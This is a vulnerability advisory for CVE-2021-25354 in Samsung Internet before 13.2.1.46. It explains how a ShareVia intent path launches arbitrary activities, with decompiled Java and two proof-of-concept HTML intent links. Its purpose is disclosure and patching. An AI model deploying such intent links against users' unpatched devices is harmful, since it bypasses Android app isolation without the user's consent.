CVE-2021-25354 Details
Original post: https://labs.f-secure.com/advisories/open-activities-via-samsung-browser/
| Product | Android devices with Samsung Internet (prior to version 13.2.1.46) |
| Severity | Medium |
| CVE Reference | CVE-2021-25354 |
| Type | Application Security Bypass |
Description
F-Secure looked into exploiting the Samsung S20 device for Tokyo Pwn2Own 2020. An issue was discovered that allowed a specific browsable intent in Samsung Browser (com.sec.android.app.sbrowser) to either:
- Launch non-exported activities in the Samsung Browser application
- Launch an exported activity in any installed application
Note that while this issue was found on a Samsung Galaxy device, the Samsung Internet browser application is available on the Google Play store and can be installed on any Android device with access to said store. It was confirmed that this issue could be exploited on any Android device that had the Samsung Internet application installed.
Technical Details
The issue is due to the class com.sec.android.app.sbrowser.capsule.BixbySBrowserLauncherActivity methods handleIntent and handleShareVia. First, handleIntent does the following:
- Parses the passed intent and establishes the URI
datafrom the intent’s data - Parses the URI
dataand establishes the listpathSegmentsfrom the URI’s path segments - If the first item in the list
pathSegmentsisShareVia, then the methodhandleShareViais executed
private void handleIntent(final Intent intent) {
final String action = intent.getAction();
final Uri data = intent.getData();
int n = 1;
if ("android.intent.action.VIEW".equals(action) && data != null) {
final String string = data.toString();
final List pathSegments = data.getPathSegments();
if ((this.mPathSegments = (List<String>)pathSegments) != null) {
if (pathSegments.size() != 0) {
final String pathSegments2 = this.getPathSegments(0);
if (pathSegments2 == null) {
return;
}
Label_0738: {
switch (pathSegments2.hashCode()) {
...
case -679124017: {
if (pathSegments2.equals("ShareVia")) {
n = 4;
break Label_0738;
}
break;
}
...
switch (n) {
...
case 4: {
this.handleShareVia();
break;
}
Next, handleShareVia does the following:
- Creates a new intent
createIntentWithTargetTask - Checks if the second item in the list
pathSegmentsisresult_type_success - Checks if the third and fouth items in the list
pathSegmentsare not null - If the fourth item in the list
pathSegmentsis notcom.sec.android.app.sbrowser.ReceiveWeChatMomentActivity, then assign the followingcreateIntetWithTargetTaskextra values:packageName= the third item in the listpathSegmentsactivityName= the fourth item in the listpathSegments
- Start the activity outlined in the intent
createIntentWithTargetTask
private void handleShareVia() {
String pathSegments = getPathSegments(1);
if (pathSegments != null) {
Intent createIntentWithTargetTask = createIntentWithTargetTask("com.sec.android.app.sbrowser.INTENT_SHARE_VIA");
createIntentWithTargetTask.putExtra("resultType", pathSegments);
if ("result_type_success".equals(pathSegments)) {
String pathSegments2 = getPathSegments(2);
String pathSegments3 = getPathSegments(3);
if (pathSegments2 != null && pathSegments3 != null) {
if (pathSegments3.equals("com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity") && !this.isWeChatAvailable()) {
Log.d("BixbyLauncherActivity", "WeChat is not installed!");
createIntentWithTargetTask.putExtra("resultType", "result_type_fail");
} else {
createIntentWithTargetTask.putExtra("packageName", pathSegments2);
createIntentWIthTargetTask.putExtra("activityName", pathSegments3);
}
} else {
return;
}
...
try {
getApplicationContext().startActivity(createIntentWithTargetTask);
} catch (ActivityNotFoundException e) {
Log.d("BixbyLauncherActivity", "[handleShareVia]" + e.toString());
}
}
}
Using this information, it is possible to create a custom intent that launches a specific activity:
intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/<package name>/<activity name>
The following example browsable intent link will launch the non-exported component com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity in the Samsung Browser application:
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
By replacing the appropriate fields, it is also possible to launch activities that are exported in other applications. The following browsable intent link will launch the exported component com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity:
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
Remedial Action
Samsung has released Samsung Browser version 13.2.1.46 which fixes the issue outlined in this advisory. F-Secure recommends that users upgrade Samsung Browser to at least version 13.2.1.46.
Credits
This issue was discovered by Ken Gannon.
Timeline
| Date | Summary |
| 02/11/2020 | Issue disclosed to Samsung Mobile Security |
| 02/11/2020 | Issue assigned to a Samsung Security Analyst |
| 12/01/2021 | Follow up sent to Samsung |
| 17/01/2021 | Samsung confirms the vulnerability and rates it as a moderate risk issue |
| 09/02/2021 | Patch released, Samsung initiates process for bug bounty reward |
| 25/03/2021 | CVE Assigned |
| 26/03/2021 | Advisory Published |